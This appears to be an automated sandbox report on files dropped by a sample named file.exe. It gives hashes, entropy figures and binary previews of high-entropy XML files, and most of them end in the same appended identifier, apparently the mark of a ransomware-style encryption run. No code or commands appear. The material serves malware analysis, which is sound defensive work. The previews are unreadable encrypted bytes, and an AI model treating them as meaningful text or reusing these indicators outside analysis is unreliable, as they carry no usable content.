          Preview:<?xmly.s.N...{.8.V...)R..`.%..\Q&+...0o.z*....fL.7._k.oh.Es.8.g0W.Z.P..."....:..)..K..0c..A...&q..E.s...D%..=._l.Y......m.AF6...d..:....D.1. .....#./.g.K.....R^J...$T.o..c9r0.BF...".....\%..........4...........D$.=...i@......(..../...A...Q:......F..%~..G.[.-@..O...../.l.b...u....k7..2WZ}....3...|5?..F.&H}.gMgX...myj.........^.B)R.N5Rc-...G..p.Ss.7.q.!........xD...'k.}..]..E._.T..vR..C~.v.....a..b..m...8.emJ...?D.......@.[....LQi...`<......a.:..........H.q.a.X..X|d..vt?......U.M..O..N...*C~sy*.....L9.K.(>.R.....'(F..e...dFK=.HB....A^.3...f.`<.De....M..{.C...~ry....M....}^.....3...0.i.b..X.........]?/...2.p./......r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):931
          Entropy (8bit):7.74898863433365
          Encrypted:false
          SSDEEP:24:5vLblsfWK2ts0babIisWuUWhL7JV88GiTkbD:FJaWKNIisWutL7JV80iD
          MD5:C07E99FA6EA7532D2E585F5D3B1D8C18
          SHA1:1601444BFCABDB1A92EDAA983D81615A457E6AEA
          SHA-256:8A7687E7BDD541786864C79E714E7DA89B95BD65E6450492ED7738E2B9186827
          SHA-512:26DCD5AE25078859AB8B9C5B286F7C1AF91EC0D0E650B281CDFF7CF28662E3BA52C6DAA5246DF54BD94E37F8E8451C081F9D9D33DCE5D5DCAF8598978E6E5982
          Malicious:false
          Preview:<?xml..B....q...:|4....&sp..n...r.dl-..}.7....=..YPL.OV..{.;.`...,A@.T.ms.l...B.^j..%....TY.v..'....1....f..3.Ib/r.1...?&.N.$.k7....+...J:...y,V'=.[..H.-m.......D..Lt.{...u.......t..K...2...5!C.R:.`%\7@7.g...RoPnP..: F(....VA.q..u.......avOfD3.@.I;vX5.t.....s...K...X.%+...u....F.?..U>..`W*2lX...$.!mI0bw.(...G8o..v.....U...2h.....8.....j........b....L8.]...KKJ......0&,..l....mK]...&.CF_p~.........]......r.....D..P.]..C.%w.<E.........'../.........uh..]..f..2?..\,..uKk.t=.i.........q...)c|.h..)..es..=...g.[v_.......5u.......=..niz...j6...V.I.v.J....;..!.M..z....>....z....i.;.[l.m.......(t=7f.....mOY.. G6&.=..(.s..M..M.9ey.^C=O.....o\..d.....Y.?..F7.O.3^.9.=3sPR...f.%...Bqz?..a)....9.......M.T...I*q..p.g..3..C...l.....B[s...O.c..Dt.K0.....C.+%.x...u.|....K.u...i,.Q.#..P.g^...,.~.Lpq..<.'U.^.K$pr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):923
          Entropy (8bit):7.774248444362352
          Encrypted:false
          SSDEEP:24:kydFWI5gXXwjB15nNxImp8EhN5ZGiTkbD:pHWIYXoBHnjBhNjjiD
          MD5:0965966E7E919DE17399E672BCDC21E8
          SHA1:8D4A24FE6927C87029E8C674A319CC070135A4E2
          SHA-256:E8633C55FE16C1AAE29FA204E3A3F7A32CB9DF244747357354803B3E66501810
          SHA-512:BAF2C216CFEE2646B97954DB0F26DF38EC403D913022B4AE08BB16B2942F14D86473CA6045B2BA54D0D6EF0336A83E9025EDA14937FBEEDE8D7461342BE49039
          Malicious:false
          Preview:<?xml....U.2s6..Q(4,l......*..x].O..v`...!...FBF4.2.$z..$...._w.&..v~.".......n2.8.n...~.29...z...QmQ.. ...}*s2...;mv}....:.S\.Q..y.....!V....y..L%~I....+...,..N.MtL5)...I.0$.?.R..Cj..+.G.........lj........\..{O....G<_.x...p.Rl....z.>... "....g3.P._{%....^..2(4>bo,.l...~..=..........R,7.rf.....ba......-.O....P....7..;l.n/.s.{..+....3<......W....q.4E....5.Tv.].:.uB..v9...n..^y..P.Y.....e...3..]...x\.[........Y.mu.rH....g...I.c......l....F.7'i..c.v...K.e.Y.L....O......O_3...2.....%....".W2["8..n9....y...>1.X.Os0...2$<.].......Jbp..x}$".{.#m.6>."2.Z|b..... Th.eSN...6...n.R.'..+<.........3....0K$..E.p..RU..@.....Z..z./..C.y.XwNn......)...,E..us.ei..r'.y&..1..x$..j.UZ..I}.2.&....ed.,../+D...>.xTJ.*..;.9&qv.~.S.,....sk.K#...)..7.QvB.G./...u......`.....[.^...}.b.P.pV...%....hX\.}....sq.m..)...F.......z..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1267
          Entropy (8bit):7.825401774510226
          Encrypted:false
          SSDEEP:24:aZFzJ7izyQKZUARh3I1somEHs33WtEc03/FV5PFJa9CztrGOiTkbD:eFIzEZDHqmf3WiFP59Ja9AtriiD
          MD5:5E5E639241BDA01CB51272430EEC52C6
          SHA1:3BE2A851DAA5414EC8B033CCC1E7CB85857D83BD
          SHA-256:90EF16943CCDF9143031F2209BCA73E9A663807154064E13DA17DB2C9EC8D11F
          SHA-512:06D14702192FBA5A681C0102A9961007346FA275C376A82380D4ABFC105454EB795A43369A1DDB44AE615B0A472E6E39F66663F651772890A71F44912C3D6B83
          Malicious:false
          Preview:<?xml.......C@....D_.(.......rl.!.o.r..8.F/..p..X~=...z.M..#B=..bB.tV..V.Wy....&.*no....k9x0...F"T....@eQB..r.~...s...P`.. ..m.eA...Q.0...J}...f...U>1w.&.k..3.+G....{b.j.r...O....'.0.:Tz...R.mY{.V.K4....>3.-=Y.jK...7..2.2.....KKp...f...H.....CzS|.R.J...J.....b./m/....O...Q...d...j4.9.Y...{{U8..,R..V . P2.k...%v.....T.........%....m..../........k_4.+..v...b..JUy$.R....~z".HM.....^.......#..s.W.\..R..W.Q.U{..:U>..]....i.../.h$\*..T.....8.q.*._..r.2.Y..~"._K...r....3GdP.Vi....F.0....a\..)j>2J.b.1OQ...\..>?l...*W...a.!(J..hm..&..P...|.B.a...Z.p....%..dS..5......e18[..W.%..iR...e.h...r....&bY#p..,DT.Py.].z.+.l.L(m...z.. .l"I7|{...lr....iw.....u|yh2......,..NX.S".D...[a7bD2W...$.'QB....{./).........`..h....W........P..D.....x....J)......u...I.,.....#X..u<$dI..7.A...J..W.0.`.d.Tho@X....Jv.bi,..aG.^.gx..0h.>w#x?....{...8.n.8...0....,..\....>.`..D..c.8A}loMKK.I..R..Y.H.G".........H..4....y..W^v...o.1......E`....hf..h...~ .a.:T........Nw.vA.....|g
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):719
          Entropy (8bit):7.629445225461814
          Encrypted:false
          SSDEEP:12:nAQx+QQ4l0D4LkaI7ah3i/JT1vWRe/N81b5rPFG24i8/ixpZacii9a:2myD44yh3AJTpra5TFGMyiTkbD
          MD5:F9F336F2A3A6AAE03D821A9253D7A02A
          SHA1:F6187A743644D2D0C47D80A1D35F0C96229A6B0F
          SHA-256:DFA7BF1829D7D4040A00CBF3EB7E498CA8EAE1906B51C4C775C03719DB905017
          SHA-512:2EDF34F8059F586A9A683A2FDC1A957EA6B60132E2C732D196CE14D008F3E797F4E9DC84027B169D9F0D9FF18E17A1736ED6E7664794600BD105428042F693C0
          Malicious:false
          Preview:<?xml.~;.....d..ny.B.u.O...........*..8`.i..b...}..K..e.NA.:p.{..1.....R.Q.pdI]...,65.0s8.,..l.xk.Z.7S9..W..}...d./.*...R.....N.]3...NWD...'..~.B6...a+R.*G.R..Y8.VM....zN.r.f,.Rr.M..$2.jR..kS..KbFT.:.3.ppS.X.9....[.9....v.U2.w.!/..!.U.....2..CY.6.+}..rm;.;K..O.t.E...3dQ.a..~..1.......y@...8..jeYD.18>.W.e.LJtf.......U4o....~...`....$..SXz..1..W.n.=.....T..F.P~.: ..~E.....|....yqtS_'..1..=.zH.......p.x..L..8SGM.d..4>.*..'.F.....y..'.......F).....C.%...7.&3...N5*..e.(a.x!=....P.p{/.4<.LA.h*.M...].v.F..^._.2ZS.Ds......../%.{...@|'...OI:3.j.6.v3'.b..s..@:....nGU(.g..nt>..`8..f..4..E...G...H..P..].t...n:...].=..x.k..?r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):723
          Entropy (8bit):7.688533315835616
          Encrypted:false
          SSDEEP:12:cp1uU9RbZK5cNUnQXxvatuJlL8ktDuZOiDTm0a1SapIcWPoT2ixpZacii9a:k1uU9RSEbhyt2xtD0nTm0a1VpqgyiTkX
          MD5:E5011C425C34D215F300A834424F4CE9
          SHA1:CCABC6691F9EB2C4D49EE1FBD614E0139568E6B9
          SHA-256:0BF20D2A8C88993225703E8BC2C4737C0E9EC92CBCF490D87810D6C760B7A2F5
          SHA-512:BAC0CC75775D473C95A313F1BF4FFC7588C6A3722ACC83F576C0BD16125E6D50D1705E90369EF7617FA1E518A0D7D2CCC742CD9B4571D1A1D878C974A61F7FC5
          Malicious:false
          Preview:<?xml..+..Eh.#.{.*...z.+.v..If..i.......85.j.`.......XW..1.;.....[...p.6..g..`O..)..A-G.....q5{L._.."$...0.J..p.....l...=h.w/>..tj..a.....#...9}.y.3V..HBbs....'..'T..,D.YSe..<.ZhM..v....6.....5....^.|......{...:.].#.|.+.#....1..=..z1.(..C!.R..R.e`.{....~...)....+.c...S.$.q...*./w\.......>P..'.....:...Z..@[ ty..W.p.e~...Aj`R.g..{..}..={...2h6Zq".}...L..!q.Sq.pMu.C=g...b...H....N. ....P......}..M...............W... ...8.{|..)M.!8VM=.f../...m.0L.#.lp-.r.i...Ks....8.~e...y&.z.:......W.l..+..|{O...L..3....k..t.2.Sr.-.'....4..>j. .s_>..|q.....)Uk.wI..>...3#O..D....v..B.q.^@.c/..D,..L.g."..8B..........5..$n.. Xx@#.a..<..j....1r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):817
          Entropy (8bit):7.766833091610306
          Encrypted:false
          SSDEEP:24:nAQNkhJZ5sUsmEptyP7W8tK57fl3oXGAViTkbD:LkDwdmiS7WGK57fkGAsiD
          MD5:806382194E295B467C95387D7D41204D
          SHA1:BF7B0835E234C5AB1001B4D956E6404B8580D1F6
          SHA-256:AC3894B068669189A19779D3949461CA485AB33A1A45E85248734B0AAA1978B2
          SHA-512:B92C1C750D74744369FF306AAF6271D6FABDE93423ACF0226726B881ED8D226CE6E2AB9E1F6AAB696B19C5013AAD8931C5BCCF14B40249CDEA6C0F1345C993B0
          Malicious:false
          Preview:<?xml...I.U..=.....N.....[...Q...-.(....C.N...|h.@.-.s^9:.|k...Q.=.{.}.7`.$.X.D]q@.x..o|xG.d...Xr..w.-.LA?'O...M.N....2VW...M..K.0....(.....d.......H...I_....H?D*0.^....}..g&..*h..5.h.I.\.../........$.s.......R.F....'..CNm...1..e.>...]{.Q..z...s.77.f...D..3.)..N.....4.b:w.+....J.......W..Y...|.....|g.7w.<?]....>..z..%.ru....h..0'.i..C..MRoY.AA...qi.6......6...... .]..^v..0"......]..).|.?..SqT.K.0...W...f.*.....!..h...b.@.T..../,..^....sy.....d.8^.u...i/h..ZV....8KnB.oCm!..p.........y...[.Y.m.....`....DC.F........ F....S-..r6.......b.Q..$,...Dm.,...%8_\\H..o.SB"....wO.4...R.2].p..%..m(./h....?..W......m....y..o.!.b.~I.OSp.p.8..Q.L0..M...+Z..N....b.b..m.d.P..R.?.=6......X....~......[E...H.,#.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):719
          Entropy (8bit):7.747671643611034
          Encrypted:false
          SSDEEP:12:MAf35ZcsDeexTu8GN4J7ECdMT+ADo78lo4X5rVAsF03CO7FPayrqixpZacii9a:MKJxTu14u+AD0iFVAsF6Cya4qiTkbD
          MD5:59B1E331A4431527EC55904ED6D60FC0
          SHA1:16EBB795489FAE548EC8DB26C5BE286EF7072796
          SHA-256:16BAE855CA4E8E2F433A31619ECAF12B3FFA90DD76CBEA2FA3D3B8646B6E875F
          SHA-512:53E976638E94C3E84977A7E81C8CE88BF4040725A1E08E7B97F08EF4C308A5AC9300848A279DE38BA3BD4D170BD45DCD030E8B74741FA6689E455E254DB98711
          Malicious:false
          Preview:<?xml.'.. .L..,.....%.{|....U:...W)....u..F....j..ik..l.r.>^. .N.d.b15..,..X.......".OA`]g.S6ci.U...T...d.R./.f..g...Y..JTO.Gy)....t......c$.f....S.7...:.....H.......BP.!....b....f.....F.4{...}.....J.....DvG...a..;....O...C....C.C....+F..T1.+..N.Fn.w..?..].. ..w@.W.i%.;..7.:.l.4...e.Q].....Lo$X}.(.6.......y<.=......%..p..).v....&~...-....5e<NX.|%.......~..K..26..j7f..7..2.7z<."..MD*/+.Z.`.2&o....mR..U.}..|V.....H..c.M.T...........mI..&O.....vj3z....a...\'..+.]b..\.2j."<..CR..G.......J<..A..@X......{.0..&..s.. ..,..nU.#.k....Q...#..N=..<.i...g.........H...{..K$......`^Vb.._.k...7.......,.z...Y..2..D..'..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):881
          Entropy (8bit):7.738687337890111
          Encrypted:false
          SSDEEP:24:qWOkjtGC3B7rek0N9auQbyhoGIqTp/LI01lkMWiTkbD:fjtGCRGvlQbDGZp/LI0X9iD
          MD5:118947B2B7F832199810E2C7443B56DD
          SHA1:A8CF8440DB9ED03B9971BF6CF698871B8BD0FC74
          SHA-256:85922FB28EE84CB8F595B8E01F76E58730BDD4D24414CE924307C1584C74B57E
          SHA-512:9ABD60C258137EDB8B41B112B7E6A984D086B8F3877A79BB6991168ADA77AF5180697EBA4A3F28496248DC10D03F1393F6A8E3EF93B218A6750B2225C96E8C9B
          Malicious:false
          Preview:<?xml.....i.3$...@.x....>....!..c..E.b....&.[#..c..t...{....W.kMl...sK...Z.H.S...g..!.7.6svlI..v....q2)g.X.q...d...*.:..o-Vg.......W..0I...$G...D7..`.^..s,...q)^...Jp..-....d...R..".5e.+...Pc..l.>bg(9.kr.......P..!..N.....d..M.tr...'wi...Ab..xw..C......Y.....a.68.....tN,..Fk.yA....*.D.......57b......'..;......u@.ZtnU7...........6...m.I.......98..f..j..|:xt...}F..~&MN|..wm..k....nr/.;...5.sEa......E..^.N).Ry3]r.*;.DI<L.F.D......6c[*.".M..n..2.r.....~.#..]f...Y._.....`....$H.@.n..f.1J2U...e.!.<.c.,b..!p}m....PG....S&..I%.Wds......XM..c"MI.%......NT.Q.A....G..<.R..g.D.{....T...-a.j..G..=.3.. ..q...|..{.v..L........A.{HE]...7.k...L.........*.D.."Q..hp..h.V...(......g..=t.../.}...I......M...t...q...i..^...V1e.)..h5du/....M,....ie.2..Lb.R.vN...s..N.ekr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):737
          Entropy (8bit):7.68141727149623
          Encrypted:false
          SSDEEP:12:OXP2eyDBNvIlugpqN/GAa9aMDCszRICBGxiVA+Q2/eRTc07fP73qE81sixpZaciD:OOeENt6qN/GhIMDCLCwkVzQ2md7+fsiq
          MD5:50529EBA6740B5E15B43D9707549D34C
          SHA1:E3C219C60726BA6EB93E1A81DB06EBCD2CFDEF53
          SHA-256:C36535A9606CEF2C54C038F75BA1E4B528F5275C755D70274A1988EABE39E17A
          SHA-512:E888477A5045796261690DCA4EF3408A1C359C1C41EFE50D41894B91774076C2CD80D35CD9D14D4CEF1BA597D4525BC538E153FA0FD5A463CD562EBB067AFBC0
          Malicious:false
          Preview:<?xml...tN#.Si:H....XR.].q-5......u...q.jQ.. .q....4/.;...T5..|.W./".....].x..J.8.U.L-6f2I.i.9\.......S..&...x':vL.9f.g......+..c.....Z....../.7.....1.k..........R.....].On.*.d.D.....j.).......1...}..........xV2.7....P27..A /`...I.`.~*0S....t...UV.f9.m.a...+...C.....I...I..-Z..Q...1..f.i1/.T.)...:M.....a}(8.....3..s.....<..N=...k...2.M...7D....$.}(.:F..x..%BRN>..S..B!.%}........T.V....2.@pX....:.yS..n..q....G*(4.....Je.. ...\..6=c....C...P.E...,j...9O..FTloC.....GNH..,k....k.../".8]..]LZ.i..L..}4Q&!{.v......@h7s...s..6S.$...0..^..a..g...{...v.y.!..KzP.......5-zP.....<,..}b..:>..c...x.tv..R..Mf.q...[&H.se*.,%I.h.%......r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1421
          Entropy (8bit):7.855040839918493
          Encrypted:false
          SSDEEP:24:GuJXeb6HqrLiaLxpq6TB2PIkixS30zpiaHLa13Sr8JBTrTeI1/iTkbD:1JXebNLiQxMOB5HBisapnciD
          MD5:635586FBFEFE8EB15866066900EDBEFC
          SHA1:4A390B0A96C596EFCA1AE3A47C7867B89C4B55DD
          SHA-256:90C2B1004B1C9DC48804709A45C4E18ECD2BD00B06BA755311CC50D30600004F
          SHA-512:64F58DF8602D9F7D176F25651C7F120C2F6BF205C4A3A5799BA46EEB7B2EEE7086BCA2F9A4A12DF2F5B886E6462BF11E221480FB59B96D20CC191B1646DD514E
          Malicious:false
          Preview:<?xmlc..n\...\!#..@`oVc.....XO....I>...6\._0$*\.......Z[@..:...^....3. j.....6.<..*..|X.^....6.B*6.....|0....h.i.w.O......2...6....E.0Y.o...HQ#+% ...."...2..2p.....-/W.v....R....a...8VE@..ob...6.eY&..^.T.BD.R.$.A~...E ^?..........DX..FqO.r.>[.I..&..^.B.`K...3.k..UA..^.%...\c..!.b..NQ............}.....Hs.....F..G.I..C.nx.D...@.m.....W........x......L.ET:.g...F.e.{...t.2h....HC..`.m...IU~?....B.11.X..k..j.........(.......!..S.=.7..6'......=....F.8....4..ses<g,.^.O.3(..m.zN....|;..f....g.A....&.A........iC.Y..r....H..H....8.*_....W....T..ux.N..?.:..3hRlx...1a...."<..:..I.(8..'.Dn.G.Cv....S....R......j.......^:m-f.. .R..[bL....lR,/.......MGC.Q..i...@T..?..o.s...g.EH....X.N...Bn..g............w.8.g...<.Z^.e...W...O..3....B&j.k../.@._..q..[.C...8amiT......5..t..U.Ed.6..7.?.xt.C...C.../.C...};....k.....L.}c..U.k..Q.l.........5.x}....c..|.>...l^......BK.$...L'....v....qyZX2q`E.f.h....).~.....`......:...^A..8..6.y. L..W....x2.........[....#..o.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1171
          Entropy (8bit):7.805042457808391
          Encrypted:false
          SSDEEP:24:MjQGq82xaKKPwBeH3oWavuzMd7ynMYNs4pbN/oMeybwGAsLiTkbD:MjS8NPpH4WamzMda/vqRy0WeiD
          MD5:E0553A985F6D428AB764864DBC5768CD
          SHA1:AB6833B2C286CA05870104692059BF46BEFEBCE6
          SHA-256:139899B2561F32D32537098BE9C10A36CFE3D6703C6D261058016C5243539C53
          SHA-512:FCFFC3A303C9F25D152060A114332DF6B2B6B36542AB752417093DF6DAAB624F6E9BEBB126FA85DA1E21CB30877496C4C5F635693D655DA4976A17558D22EB8E
          Malicious:false
          Preview:<?xml.....@.`..<...F.Q...*..*....}.../..Rn0...2...f..*..-Xd..(U..q...7.|...n.?.Q.z.s.7...GJ...r.@..0...}R..m..Y.M..Q.]j...S....m.s/...)7.Z.^.0..../....p.o+.}..l..Ja.%..:..)\..#.r.:j..n..>>.#.T...@..ub...z..q...t....y.....-.....N.t^.~H5|]...R..O....<c0y?........0....-z.........P#8@..Qw.....,...s*X...a.S7M.Y.hK.7.:..nj^.%.v&&....}.Ft.p.L.w..D.[0q.E.@W..D.....i...<^...ah.f.c...S.....:..`/C.vW..V...~.b^J..N...D..=.A.;>..{.UX..........4R....Y.;._......1.K.\...._..zP.t....5F."K......E...5_.....(S......x,.....?.Cn.f.;a./....Ag}...L.>..-.....'kj.m...{9..~.6...L~U...j..^~.Ys..q-.st.Q...o.(/m.LT..!O..LG...k. ...'_0F<B.L8v .e..M...pE.....jT.P...q{.N.g....>...;L]{?6M.Lr...".........-b..H..r[.9..U<..m.g\..........&..].8d.D~{....W$.u....L.d....OA..$......\..1.3...5....!..m,.S)...v..kr.../..0..\%.j....^-.@.......I...O..:A..2.........S..I.F.%....{.....$.M..:D..b.!..L.X....2bX.M.U..6kp0A.6.H.eY...^ .S:....yA.....q............$.t.^..zm.yN...k(.....Lq.l.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1176
          Entropy (8bit):7.823832854604398
          Encrypted:false
          SSDEEP:24:ZcGQFV7xKTH8pmrzzIjYqgsPJiILO6abpe7Eu3r8z+RPHPIuiTkbD:Za9pWIRgI9kKEug+RoLiD
          MD5:E716FC17D511994004782C91113D2446
          SHA1:6BB268A3BE29AEDD0BB43AD95B6B9B7BA6F55CC4
          SHA-256:BEF85FA323EA698D00CFE77955962B9A6DA1E6C3DAC2F129D0D08653B5F47E8F
          SHA-512:D1CF80A1D47872ED98154BEEEDB4476C0850DF39C8E25073A480C69B1AA31397CE55C1012BB800172D22EC0202D82584A67374357DAD552F4D3593E9E819000F
          Malicious:false
          Preview:<?xml:........L..ZC.9.e..s.v.......6p.n.k.V..&3B*.z>.Z......kp.F..h'.F.j........s...I..w.VFHL."7^i.g...q...{.K..9...n^)wf.<.S....[..t/n.<.o.b.z...)R.=..x.<.......$..{.O..3.. .8.hn-j..b.... t!o.n.kW.I....R.H.1.?.F.G..O?d...$...Ci.7T%(...zF..V.......{..hI.?.@*..F....QE..4.?....x..75.....i.......Qt.Y.....5l..e.9x.g.L.E.c....4..P...g;.+0cJ..90O.C%..ik.2...E|..d..w.;...).UW..+.=|.}..2.<....7./.)1Qq..c3..$Pg.&Q.........#..i. ...`P7.~....Np......../."....c..!..w0...c0.!:...[<.t..HB....p...k.x...z.....yv.&...Exo..Z....T.G.....e...4A2R..RQi.7[..._....B.'......A.6ip...E..+,..B.E..>.....11(l.*.Ynk..%)kU4*j.mu.N,.G.WGA ....a.q.]&.l.Q]......w...TRt.D-.. .(.z...+....q1.037...!.A2....*.t.eh*(,M.VQp2..~D.a......>F.A....>..8..m8u6./.....t..Gxg.V.@/.#=.i.y3.....S...*`[..@.T...{{....-$E~.<.f..@..[...R...0....)t.....(w.^l./.j. ...-y...LE"=<.}.....)#z.U..h..a{w..uq.z..R.*.<.vtD...2........d.e....q....7W...s....w.G...%~....kL...~.4......;&|..{...!.*.y.]y.mo..=:@E
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1155
          Entropy (8bit):7.867437044526188
          Encrypted:false
          SSDEEP:24:gkU178hbCu5e0Kz83VCrLH3+3ftjZea1ckN1gxADh/iTkbD:gkUlgB5ePgFCHHO3ZZeaHz+AEiD
          MD5:7EF5FD5B3D79BE7BDBFF204681CB2D97
          SHA1:02D79AB40D811028341E9F4B18E433A4705B0CE2
          SHA-256:02662B3AC7532135C9B0BD6047550D261E27344298135EBBBE75D81E1E4786FC
          SHA-512:CA6D612BEF75A34B6242F1208327605D80DF96C841D5254A24B1B1B24069B94F8A4C627AABCABDF46833E3DBA555CD68CF07BD0AE29D671C6B1AC6B03E9C5031
          Malicious:false
          Preview:<?xml.@.i{...v..;.b~)..u..lG@.$:tP.x......\.,U....W|l`.N.....6.ht..!....#.......D...x.o..L..F............IY.Q.........8..#kI(.2...#4.[.*......._..'|D.".V.w .I.f....~.+^...2z..>FWT...M..9.'.h.I...............8K..^]..qJ.=.z!...f....=tfA.K;s.R{.`...&{ILW..E....GH;..o......}.n.L..kp....3.tw..........8MR....:.c.../..C.-...f..Nv....LX...5.$2.|.E.......t.)5&....n.'8_9.)q...~`..>P..&........)yV...qk...dO..6.(`...9./......nZU.<._.........-.G_'..0.u.n..1...g..l..])kJK...v..O.k.lN..LQ.tHi."\.A`.....25.^.r..9..)...{+...=C0.LR.........@...-...5.42M...=..JT.O...<C".q1{..zF.R......u|.B..;... l....wE2....^,.l..Sg.......K.>V.h..[.d.I1..Xq.e.`...^....R...v..@ ......5wZ..OnI.(...w......"q.t.+Q........a...0.8"}n..J.d.7.gR..,h...c...Fl.\..........HI.PS.Z/..+.\..P...}....aF..W!.E.>.q..........+..t.]6`.x......Dk..>.R.E...q"."g...R.V....q...A...>M&.z..o..(.L.......4~.....h..z..|IA..*@...A.......d...,Z.].....?.3n....O..~...6V.....(..~fU.cb.._.0.1...%..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):715
          Entropy (8bit):7.667282656529386
          Encrypted:false
          SSDEEP:12:OVN20o/+pTqjjhWwtGTkbQvXBwigR6pu2JvGVwbVV3X59c21Wqq4caQzTuuLUoFl:OHC8qjlWw4Tk8vdNOe5Vn59ZWXt9CuLB
          MD5:7D44B0EDC80E543B9D80C14D907FE35A
          SHA1:5A24A937562E238B2039F3708EFBF3CFF129A72E
          SHA-256:B33800CE4E17D141A40A26BBF75130755DD5F5D289906D74F32F4991C10B1E4C
          SHA-512:7944CA873D50D0E1168FEC08E1585FA3073E73D644162AF4B60A0B68D5332E29D3431A2D4D6E06221DF84BD5B08EE904E79DA51F9A9E32E30036C7113482BBB9
          Malicious:false
          Preview:<?xmlV1N.[`".Y.'.-..I.w(..4s..Ok.k.@U2.....C.*;.......;H.._....`r...Fvc.b...i.....*..g.+PpZ..\...W.2/....q....u{a...*H#.y.4...2.;.J.AV.Vd.>........k.E.....P........Ab................R&.W4.s....c."...X\L.X....{...@..o..r..#..^.n..C98..1.P.....[.FU.%....27N././.+'..V.X(p.o.vcQ.....`5...q)|..l..{Ai.......d..7t........[.._c|..-.2..0.ez......I..vax...4I..B{we.F..."..J99Cf[[.o.z~....u.v.R.jh.4.u$....w..6..C...71.Nb.......A.<......A.X...8...O..(.].U...S.$..G...3...........1..[..[.0....+..7.....Y.J.G......L)..E.D..u.+..S.8.....xG;..40y.G.p7....}G..&akP..>aH....N..d.FY.....E..X....z.N....=~-.........1..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1398
          Entropy (8bit):7.83012028588644
          Encrypted:false
          SSDEEP:24:eoG4/VNPVAdqVTtAgn1/FC7sXMlKqbXSrzZgH73EHXzLmXxkkViTkbD:eoGIVnbr1FByKqbXIzeUHjiXx4iD
          MD5:4870BEC89A9B7698D34505A71E9B1BE6
          SHA1:755D82D83F2F46D04F9E732A8E74014994164204
          SHA-256:077B6E7954B896E008DE3EF51B447736317EED055A593C6E2D3B0B61D3B9A5EB
          SHA-512:674A8535EDB2C2972C787EAA521653BED9C5B11BC341B0EC5E61BD9C2AB1DA5E1F28FC28B82296950CFA0CF143CA163920C5F6BED0B30F787AE5F3FAD70801EB
          Malicious:false
          Preview:<?xmlo.\)...o........9-.R..6....._b.S.....p..w........B)wk....EF..J....-8.....B.2TK..........d......M.\/.vGC.(.Bn..t.J.D..T:......@....e[&2o.g..&..1t............?.._........2...4.B...IC.{...G. .AQ.......T..#......p.C/..".k.3.6#-.~..4-...7.<....j$E3..Z...Oe..E..7..H..l......;..@..F..|...v....LX...=.....fI..H..|Ejf..2j.p.F.f.0@.......7A......I......p......a.......4.v:....#. ~.H...6~.-~=.P#.F..V.CG.2~.$$..x..6.c..7...q..2..<4....t.5U.4..h......+._.Y.r5.U6.....Z...2...X z..kX.]V....>..h...6 ._.......^Tb...*.../5......K..k..7 .<a..E...O.......YcCN.2.7.pv......_.<8V.&..m...e.-..3.Y.....D.....)PmNo...4...;....Q.....[.7.d..I.4UiC..7.L..&Y...9bG.d_V.<...._..................H.h#R.N.O...9.{q.^v.9.kA..`..m.$n....gR....#42..,.1~..........M.<.?.,!f...R...b..~..ah..{.EZ_.)7..}WB...l^....2.E...==.>....[/$..0!1Y...y...s`.GS=..K.ECR....7./...~.....p.bv-......g...h..[$..aG.L...$.9....c..N...~.v.E,.....5.......g....|.c..,."D....FU%k....Fv..?.$...i
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1008
          Entropy (8bit):7.784928473483372
          Encrypted:false
          SSDEEP:24:eKtDydHXOASm9qUSQ8klBn3vpO7U7of6VsOw6ti6Vojn9BOiTkbD:xIHXOqJSQ8knn/L7oaTJti6VoBdiD
          MD5:21623A4F6E8899604D48EEED6CAFB575
          SHA1:173B9A6874D25EA3A51D4367FD58DEF5D9B14B0E
          SHA-256:D3975DB196B5C762A67D411CDB40779ED139ED7B940E0897863E183EA377BF03
          SHA-512:551A373D3F3C6C69E5EE310464DC948919A633803A5A32FF88CCE4569DD7105A5983E703E1A16D680B07E765314059A86A37D4805F2081978DBE91026F4A2C67
          Malicious:false
